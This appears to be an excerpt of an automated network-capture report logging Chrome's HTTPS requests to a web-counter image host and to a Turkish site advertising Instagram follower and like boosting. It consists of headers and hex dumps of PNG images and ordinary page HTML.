                    2024-05-26 22:58:05 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 c4 50 4c 54 45 ff ff ff aa aa aa 76 76 76 e4 e4 e4 ae ae ae a5 a5 a5 d6 d6 d6 ea ea ea bf bf bf d3 d3 d3 90 90 90 a6 a6 a6 d1 d1 d1 a0 a0 a0 88 88 88 72 72 72 c6 c6 c6 e2 e2 e2 c7 c7 c7 ac ac ac e3 e3 e3 93 93 93 c9 c9 c9 bb bb bb e8 e8 e8 99 99 99 ad ad ad 70 70 70 d4 d4 d4 92 92 92 a8 a8 a8 be be be 7d 7d 7d 7a 7a 7a 77 77 77 a2 a2 a2 b9 b9 b9 d0 d0 d0 74 74 74 b7 b7 b7 e7 e7 e7 cf cf cf ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6 26 2c 88 37 3b 7f 37 3b 52 4a 4a 8c 23 27 b6 26 2b 5b 21 24 a4 5c 5f b7 26 2c 53
                    Data Ascii: PNGIHDRQpPLTEvvvrrrppp}}}zzzwwwttt\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX&,7;7;RJJ#'&+[!$\_&,S
                    2024-05-26 22:58:05 UTC572INData Raw: 3e cc 92 b4 9c b1 02 01 75 9a 18 5b 79 f1 27 f6 e5 db 26 7a 15 db 1b 1a 80 0d c1 a1 6b 00 ad 0b 4f 0f 56 14 85 80 26 ca 6a b5 ce df f0 9b f2 d4 6a a5 2e 8b ce 5b b9 fc a1 9f af af ef 60 2a e1 ab 6f 00 f4 b3 6b a1 65 57 21 10 56 a6 35 1a df fe a1 1c 38 f4 7c 2b 1d 8e 4d 34 72 f8 40 9f a6 65 e7 e6 e5 7f 29 6a fc 8c ea 58 d3 9c 7a ca 3b 93 c9 74 8e 4e f5 ab 4d 1c de d0 bb 49 d5 09 ba 72 1b 58 63 f1 33 e6 a5 65 5a 3e 55 63 cb 2c f7 2d 16 26 56 3f b0 70 78 c1 41 03 3d bd d8 c2 13 76 e4 de b7 91 cb 11 20 63 c9 82 9d b5 58 42 7c 02 49 2e d8 b3 98 ca b5 f1 64 73 61 90 32 80 29 5c 20 74 21 79 29 0a 0e 23 60 29 55 16 bc ac c1 f2 23 f3 05 f9 35 91 82 a9 54 71 94 67 2b e8 df 0f 7a b0 c9 a3 43 7b be cd 42 6e 51 16 23 90 ad 22 44 75 94 d3 2b b4 da 2d 75 75 27 d7 52 c5
                    Data Ascii: >u[y'&zkOV&jj.[`*okeW!V58|+M4r@e)jXz;tNMIrXc3eZ>Uc,-&V?pxA=v cXB|I.dsa2)\ t!y)#`)U#5Tqg+zC{BnQ#"Du+-uu'R


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    57192.168.2.549813104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:05 UTC359OUTGET /classic/13/1391.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: */*
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: cors
                    Sec-Fetch-Dest: empty
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:05 UTC432INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:05 GMT
                    Content-Type: image/png
                    Content-Length: 1627
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:11 GMT
                    etag: "4c149ecf-65b"
                    expires: Wed, 15 May 2024 21:16:59 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 1042866
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15e2fabf38c11-EWR
                    2024-05-26 22:58:05 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 d9 50 4c 54 45 ff ff ff c8 c8 c8 c9 c9 c9 d2 d2 d2 c1 c1 c1 84 84 84 80 80 80 e9 e9 e9 d4 d4 d4 7d 7d 7d 7a 7a 7a bb bb bb b7 b7 b7 c6 c6 c6 e3 e3 e3 e4 e4 e4 ae ae ae d6 d6 d6 ea ea ea 99 99 99 bf bf bf d3 d3 d3 77 77 77 d1 d1 d1 b9 b9 b9 74 74 74 e7 e7 e7 88 88 88 e1 e1 e1 c7 c7 c7 76 76 76 72 72 72 e2 e2 e2 90 90 90 92 92 92 93 93 93 a5 a5 a5 ad ad ad aa aa aa a8 a8 a8 a6 a6 a6 a4 a4 a4 8d 8d 8d e8 e8 e8 a2 a2 a2 d0 d0 d0 70 70 70 cf cf cf a0 a0 a0 ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6 26 2c 88 37 3b 7f
                    Data Ascii: PNGIHDRQpPLTE}}}zzzwwwtttvvvrrrppp\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX&,7;
                    2024-05-26 22:58:05 UTC690INData Raw: e6 c9 c2 39 bb fa 7e 26 fa 5c 0c 2f 8f 37 ca 02 54 94 18 c9 3a 71 fd ab e0 ce f0 c8 ff 67 c8 c3 a8 28 49 46 4c db f7 85 78 f4 62 3e b7 ca ac 82 83 02 65 b6 9a 79 73 82 49 ec e5 11 14 e4 11 e8 d0 97 15 8f 91 26 de 6c 36 8f 99 fb 8d 75 c9 6c 66 cb f8 3d 66 9e 2a 00 c0 df 6c ab 69 13 c2 1b 02 48 02 08 20 c9 df be 2f a5 00 a3 e8 5c ad c1 70 f3 27 6b ed fa cb 8b b8 b0 b9 9f 81 a5 14 8b 3b 42 07 83 93 c6 d0 88 2c 62 25 89 b5 40 69 d7 f7 ba 88 5c 63 d1 63 66 64 29 eb 16 c3 30 bb b9 54 3a 83 61 89 c4 79 0c 88 18 47 22 f0 21 2b 7f 50 13 6a da f5 f5 22 d7 98 9e f4 ce 74 af 98 98 6c 3a 63 32 f1 b1 f8 ac c9 02 da 9b 1c f8 42 c3 bf 07 35 a0 86 5d 9f 4a 85 11 fd 98 ce 5c f6 83 78 96 f0 8c a6 c7 ae 9c c0 e6 1f 09 b4 00 fc 68 07 0d 00 1a 90 52 bd 5a 34 bb 42 55 db 3e 75
                    Data Ascii: 9~&\/7T:qg(IFLxb>eysI&l6ulf=f*liH /\p'k;B,b%@i\ccfd)0T:ayG"!+Pj"tl:c2B5]J\xhRZ4BU>u


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    58192.168.2.549814104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:05 UTC357OUTGET /classic/00/53.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: */*
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: cors
                    Sec-Fetch-Dest: empty
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:06 UTC432INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:06 GMT
                    Content-Type: image/png
                    Content-Length: 1509
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:09 GMT
                    etag: "4c149ecd-5e5"
                    expires: Wed, 15 May 2024 19:36:42 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 1048884
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15e33b9bb0f6d-EWR
                    2024-05-26 22:58:06 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 c4 50 4c 54 45 ff ff ff aa aa aa 76 76 76 e4 e4 e4 ae ae ae a5 a5 a5 d6 d6 d6 ea ea ea bf bf bf d3 d3 d3 90 90 90 a6 a6 a6 d1 d1 d1 a0 a0 a0 88 88 88 72 72 72 c6 c6 c6 e2 e2 e2 c7 c7 c7 ac ac ac e3 e3 e3 93 93 93 c9 c9 c9 bb bb bb e8 e8 e8 99 99 99 ad ad ad 70 70 70 d4 d4 d4 92 92 92 a8 a8 a8 be be be 7d 7d 7d 7a 7a 7a 77 77 77 a2 a2 a2 b9 b9 b9 d0 d0 d0 74 74 74 b7 b7 b7 e7 e7 e7 cf cf cf ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6 26 2c 88 37 3b 7f 37 3b 52 4a 4a 8c 23 27 b6 26 2b 5b 21 24 a4 5c 5f b7 26 2c 53
                    Data Ascii: PNGIHDRQpPLTEvvvrrrppp}}}zzzwwwttt\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX&,7;7;RJJ#'&+[!$\_&,S
                    2024-05-26 22:58:06 UTC572INData Raw: 3e cc 92 b4 9c b1 02 01 75 9a 18 5b 79 f1 27 f6 e5 db 26 7a 15 db 1b 1a 80 0d c1 a1 6b 00 ad 0b 4f 0f 56 14 85 80 26 ca 6a b5 ce df f0 9b f2 d4 6a a5 2e 8b ce 5b b9 fc a1 9f af af ef 60 2a e1 ab 6f 00 f4 b3 6b a1 65 57 21 10 56 a6 35 1a df fe a1 1c 38 f4 7c 2b 1d 8e 4d 34 72 f8 40 9f a6 65 e7 e6 e5 7f 29 6a fc 8c ea 58 d3 9c 7a ca 3b 93 c9 74 8e 4e f5 ab 4d 1c de d0 bb 49 d5 09 ba 72 1b 58 63 f1 33 e6 a5 65 5a 3e 55 63 cb 2c f7 2d 16 26 56 3f b0 70 78 c1 41 03 3d bd d8 c2 13 76 e4 de b7 91 cb 11 20 63 c9 82 9d b5 58 42 7c 02 49 2e d8 b3 98 ca b5 f1 64 73 61 90 32 80 29 5c 20 74 21 79 29 0a 0e 23 60 29 55 16 bc ac c1 f2 23 f3 05 f9 35 91 82 a9 54 71 94 67 2b e8 df 0f 7a b0 c9 a3 43 7b be cd 42 6e 51 16 23 90 ad 22 44 75 94 d3 2b b4 da 2d 75 75 27 d7 52 c5
                    Data Ascii: >u[y'&zkOV&jj.[`*okeW!V58|+M4r@e)jXz;tNMIrXc3eZ>Uc,-&V?pxA=v cXB|I.dsa2)\ t!y)#`)U#5Tqg+zC{BnQ#"Du+-uu'R


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    59192.168.2.549815104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:07 UTC831OUTGET / HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    sec-ch-ua-platform: "Windows"
                    Upgrade-Insecure-Requests: 1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: navigate
                    Sec-Fetch-Dest: document
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764282.0.0.0; _ga=GA1.2.1095029423.1716764258
                    2024-05-26 22:58:07 UTC732INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    vary: Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZgPGme00ddopqQDiGKp4A3VXtKD67e0Zj1cKoqBPH0CZoShab4WQ21OtzBHGpEmZd6GUGeLDyThcE%2F79gVeY2%2BnpLbykfka3Pk1d1edFJYpiCcwv3anoWZrcpHf6FA8%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15e3bdc2217a1-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:07 UTC637INData Raw: 33 36 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 70 61
                    Data Ascii: 3691<!DOCTYPE html><html lang="tr"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="/assets/bootstrap/css/bootstrap-pa
                    2024-05-26 22:58:07 UTC1369INData Raw: 70 65 72 2e 63 73 73 3f 76 3d 76 33 2e 31 2e 35 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6e 70 72 6f 67 72 65 73 73 2f 6e 70 72 6f 67 72 65 73 73 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 6f 72 75 6e 73 75 7a 20 69 6e 73 74 61 67 72 61 6d 20 74 61 6b 69 70 c3 a7 69 20 68 69 6c 65 73 69 20 76 65 20 69 6e 73 74 61 67 72 61 6d 20 62 65 c4 9f 65 6e 69 20 68 69 6c 65 73 69 20 79 61 70 61 72 61 6b 20 6b 65 6e 64 69 20 74 61 6b 69 70 c3 a7 69
                    Data Ascii: per.css?v=v3.1.5"><link rel="stylesheet" href="/assets/nprogress/nprogress.css"><link rel="shortcut icon" href="/assets/logo/favicon.png" type="image/x-icon" /><title>Sorunsuz instagram takipi hilesi ve instagram beeni hilesi yaparak kendi takipi
                    2024-05-26 22:58:07 UTC1369INData Raw: 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 09 09 09 09 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 54 31 4b 35 46 52 32 37 51 36 27 29 3b 0a 09 09 09 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 65 61 64 65 72 3e 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 6e 61 76 62 61 72 2d 64 65 66 61 75 6c 74 20 6e 61 76 62 61 72 2d 66 69 78 65 64 2d 74 6f 70 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 68 65 61 64 65 72 20 70 75 6c 6c 2d 6c 65 66 74 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 72 61 6e 64 22 20 68 72 65 66 3d 22 2f 22 3e 0a 3c 69 6d 67 20 61 6c 74 3d 22 69 6e 73 74 61 67 72 61
                    Data Ascii: new Date());gtag('config', 'G-T1K5FR27Q6');</script></head><body><header><nav class="navbar navbar-default navbar-fixed-top"><div class="container"><div class="navbar-header pull-left"><a class="navbar-brand" href="/"><img alt="instagra
                    2024-05-26 22:58:07 UTC1369INData Raw: 2c 20 73 65 63 74 69 6f 6e 2e 68 65 61 64 20 70 20 7b 0d 0a 09 09 63 6f 6c 6f 72 3a 20 77 68 69 74 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 09 7d 0d 0a 0d 0a 09 73 65 63 74 69 6f 6e 2e 68 65 61 64 20 70 20 61 3a 6e 6f 74 28 2e 62 74 6e 29 20 7b 0d 0a 09 09 63 6f 6c 6f 72 3a 20 61 71 75 61 3b 0d 0a 09 7d 0d 0a 0d 0a 09 2e 64 65 73 63 72 69 70 74 69 6f 6e 42 6c 6f 63 6b 20 7b 0d 0a 09 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0d 0a 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 30 70 78 20 31 36 70 78 20 30 70 78 20 72 67 62 61 28 35 30 2c 20 35 30 2c 20 35 30 2c 20 30 2e 34 29 3b 0d 0a 09
                    Data Ascii: , section.head p {color: white !important;}section.head p a:not(.btn) {color: aqua;}.descriptionBlock {display: block;text-align: left;background: white;-webkit-box-shadow: 0px 0px 16px 0px rgba(50, 50, 50, 0.4);
                    2024-05-26 22:58:07 UTC1369INData Raw: 20 37 39 2c 20 30 2e 31 29 3b 20 2f 2a 20 53 61 6d 65 20 63 6f 6c 6f 72 20 61 73 20 74 68 65 20 6c 65 66 74 20 62 6f 72 64 65 72 20 77 69 74 68 20 72 65 64 75 63 65 64 20 61 6c 70 68 61 20 74 6f 20 30 2e 31 20 2a 2f 0d 0a 7d 0d 0a 0d 0a 2e 64 61 6e 67 65 72 20 73 74 72 6f 6e 67 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 20 23 64 39 35 33 34 66 3b 0d 0a 7d 0d 0a 0d 0a 2e 77 61 72 6e 69 6e 67 20 7b 0d 0a 20 20 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 3a 20 23 66 30 61 64 34 65 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 34 30 2c 20 31 37 33 2c 20 37 38 2c 20 30 2e 31 29 3b 0d 0a 7d 0d 0a 0d 0a 2e 77 61 72 6e 69 6e 67 20 73 74 72 6f 6e 67 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 30 61 64 34 65 3b 0d 0a 7d
                    Data Ascii: 79, 0.1); /* Same color as the left border with reduced alpha to 0.1 */}.danger strong { color: #d9534f;}.warning { border-left-color: #f0ad4e; background-color: rgba(240, 173, 78, 0.1);}.warning strong { color: #f0ad4e;}
                    2024-05-26 22:58:07 UTC1369INData Raw: 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 3c 64 69 76 20 61 72 69 61 2d 6d 75 6c 74 69 73 65 6c 65 63 74 61 62 6c 65 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 70 61 6e 65 6c 2d 67 72 6f 75 70 22 20 72 6f 6c 65 3d 22 74 61 62 6c 69 73 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 6e 65 6c 20 70 61 6e 65 6c 2d 63 6f 6c 6c 61 70 73 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 6e 65 6c 2d 68 65 61 64 69 6e 67 22 20 69 64 3d 22 68 65 61 64 69 6e 67 31 22 20 72 6f 6c 65 3d 22 74 61 62 22 3e 0a 3c 68 34 20 63 6c 61 73 73 3d 22 70 61 6e 65 6c 2d 74 69 74 6c 65 22 3e 3c 61 20 61 72 69 61 2d 63 6f 6e 74 72
                    Data Ascii: </p></div></div><div class="container"><div class="row"><div aria-multiselectable="true" class="panel-group" role="tablist"><div class="panel panel-collapse"><div class="panel-heading" id="heading1" role="tab"><h4 class="panel-title"><a aria-contr
                    2024-05-26 22:58:07 UTC1369INData Raw: 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 64 22 20 64 61 74 61 2d 70 61 72 65 6e 74 3d 22 23 61 63 63 6f 72 64 69 6f 6e 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 68 72 65 66 3d 22 23 54 61 6b 69 70 63 69 48 69 6c 65 73 69 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 70 6c 75 73 22 3e 3c 2f 69 3e 20 3c 2f 61 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 38 30 30 30 30 30 3b 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 22 3e 3c 73 74 72 6f 6e 67 3e c4 b0 6e 73 74 61 67 72 61 6d 20 42 65 c4 9f 65 6e 69 20 48 69 6c 65 73 69 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 26 6e
                    Data Ascii: a-expanded="false" class="collapsed" data-parent="#accordion" data-toggle="collapse" href="#TakipciHilesi"><i class="fa fa-plus"></i> </a><span style="color:#800000;"><span style="font-size:22px;"><strong>nstagram Beeni Hilesi</strong></span></span>&n
                    2024-05-26 22:58:07 UTC1369INData Raw: 69 6e 64 65 20 65 6e 20 6b 6f 6c 61 79 20 79 6f 6c 75 20 67 c3 b6 6e 64 65 72 69 6c 65 72 69 6e 69 7a 69 6e 20 61 6c 74 c4 b1 6e 64 61 6b 69 20 79 6f 72 75 6d 6c 61 72 64 c4 b1 72 2e 47 c3 b6 6e 64 65 72 69 6c 65 72 69 6e 69 7a 69 6e 20 61 6c 74 c4 b1 6e 64 61 20 6e 65 20 6b 61 64 61 72 20 c3 a7 6f 6b 20 79 6f 72 75 6d 20 76 61 72 73 61 20 6b 65 c5 9f 66 65 74 65 20 c3 a7 c4 b1 6b 6d 61 20 6f 72 61 6e c4 b1 6e c4 b1 7a 20 69 6e 73 61 6e 6c 61 72 c4 b1 6e 20 73 69 7a 69 20 74 61 6e c4 b1 6d 61 20 6f 72 61 6e c4 b1 20 6f 20 6b 61 64 61 72 20 61 72 74 61 72 2e 53 69 74 65 6d 69 7a 64 65 20 62 75 6c 75 6e 61 6e 20 c3 bc 63 72 65 74 73 69 7a 20 79 6f 72 75 6d 20 68 69 6c 65 73 69 6e 69 20 6b 75 6c 6c 61 6e 61 72 61 6b 20 67 c3 b6 6e 64 65 72 69 6c 65 72 69 6e
                    Data Ascii: inde en kolay yolu gnderilerinizin altndaki yorumlardr.Gnderilerinizin altnda ne kadar ok yorum varsa kefete kma orannz insanlarn sizi tanma oran o kadar artar.Sitemizde bulunan cretsiz yorum hilesini kullanarak gnderilerin
                    2024-05-26 22:58:07 UTC1369INData Raw: 74 73 69 7a 64 69 72 2e 20 4b 72 65 64 69 20 73 61 74 c4 b1 6e 20 61 6c 6d 61 64 c4 b1 6b c3 a7 61 20 68 69 c3 a7 62 69 72 20 c3 bc 63 72 65 74 20 c3 b6 64 65 6d 65 7a 73 69 6e 69 7a 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 33 22 3e 0a 3c 68 35 3e 42 69 7a 65 20 55 6c 61 c5 9f c4 b1 6e 3c 2f 68 35 3e 0a 3c 70 3e 48 65 72 20 74 c3 bc 72 6c c3 bc 20 73 6f 72 75 20 76 65 20 67 c3 b6 72 c3 bc c5 9f 6c 65 72 69 6e 69 7a 20 69 c3 a7 69 6e 0a 3c 61 20 68 72 65 66 3d 22 23 6d 6f 64 61 6c 43 6f 6e 74 61 63 74 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 6d 6f 64 61 6c 22 3e c4 b0 6c 65 74 69 c5 9f 69 6d 3c 2f 61 3e 0a 6b 61 6e 61 6c 6c 61 72 c4 b1 6d c4 b1 7a 64 61 6e 20 62 69 7a 69 6d 6c 65 20 69 72 74 69 62
                    Data Ascii: tsizdir. Kredi satn almadka hibir cret demezsiniz.</p></div><div class="col-md-3"><h5>Bize Ulan</h5><p>Her trl soru ve grleriniz iin<a href="#modalContact" data-toggle="modal">letiim</a>kanallarmzdan bizimle irtib
                    2024-05-26 22:58:07 UTC1369INData Raw: 5b 72 5d 20 3d 20 69 5b 72 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 09 09 09 28 69 5b 72 5d 2e 71 20 3d 20 69 5b 72 5d 2e 71 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 0a 09 09 09 09 7d 2c 20 69 5b 72 5d 2e 6c 20 3d 20 31 20 2a 20 6e 65 77 20 44 61 74 65 28 29 3b 0a 09 09 09 09 61 20 3d 20 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 29 2c 0a 09 09 09 09 09 6d 20 3d 20 73 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 6f 29 5b 30 5d 3b 0a 09 09 09 09 61 2e 61 73 79 6e 63 20 3d 20 31 3b 0a 09 09 09 09 61 2e 73 72 63 20 3d 20 67 3b 0a 09 09 09 09 6d 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 61 2c 20 6d 29 0a 09 09 09 7d 29 28 77 69 6e 64 6f 77 2c 20 64
                    Data Ascii: [r] = i[r] || function () {(i[r].q = i[r].q || []).push(arguments)}, i[r].l = 1 * new Date();a = s.createElement(o),m = s.getElementsByTagName(o)[0];a.async = 1;a.src = g;m.parentNode.insertBefore(a, m)})(window, d


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    60192.168.2.549816104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:07 UTC785OUTGET /assets/logo/logo.png HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764282.0.0.0; _ga=GA1.2.1095029423.1716764258
                    2024-05-26 22:58:08 UTC744INHTTP/1.1 404 Not Found
